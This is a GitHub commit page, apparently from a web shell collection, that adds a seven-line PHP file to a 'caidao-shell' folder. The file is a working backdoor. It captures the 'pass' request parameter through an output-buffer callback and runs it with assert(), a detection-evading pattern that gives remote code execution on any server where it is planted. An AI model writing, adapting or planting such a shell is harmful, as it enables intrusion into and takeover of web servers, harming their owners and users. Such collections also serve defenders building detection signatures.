Skip to content

Commit

Permalink
add w-ob_start01.php
Browse files Browse the repository at this point in the history
from : wooyun.org
author : isno
  • Loading branch information
tennc committed Oct 29, 2015
1 parent 777cd7a commit e046b28
Showing 1 changed file with 7 additions and 0 deletions.
7 changes: 7 additions & 0 deletions caidao-shell/w-ob_start01.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
<?php
$evalstr="";
ob_start(function ($c,$d){global $evalstr;$evalstr=$c;});
echo $_REQUEST['pass'];
ob_end_flush();
assert($evalstr);
?>

0 comments on commit e046b28

Please sign in to comment.